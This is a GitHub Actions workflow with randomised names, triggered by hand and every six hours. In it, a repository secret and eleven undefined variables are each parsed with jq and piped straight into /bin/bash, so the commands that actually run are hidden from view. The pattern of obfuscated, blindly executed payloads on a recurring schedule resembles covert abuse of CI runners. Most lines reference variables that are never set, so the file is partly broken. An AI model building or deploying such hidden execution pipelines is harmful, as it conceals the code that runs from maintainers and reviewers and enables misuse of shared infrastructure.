name: xianghuaguo3451
on:
  workflow_dispatch:
  schedule:
    - cron: '24 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xianghuaguo3451
        env:
          bsu91: ${{ secrets.bsu91 }}
        run: |
          echo $bsu91 | jq -r .ujt5 | /bin/bash
          echo $ptq371 | jq -r .omky6285 | /bin/bash
          echo $ngqs9221 | jq -r .v0658 | /bin/bash
          echo $gi3966 | jq -r .khi30222 | /bin/bash
          echo $fprrt1 | jq -r .sgtup71683 | /bin/bash
          echo $bfadv451 | jq -r .z83256 | /bin/bash
          echo $u93630 | jq -r .khn9 | /bin/bash
          echo $doice1712 | jq -r .tts26301 | /bin/bash
          echo $s41999 | jq -r .ys70112 | /bin/bash
          echo $lqday7 | jq -r .opuf47 | /bin/bash
          echo $sbb6421 | jq -r .iuxvq79875 | /bin/bash
          echo $ncby2 | jq -r .lj85 | /bin/bash

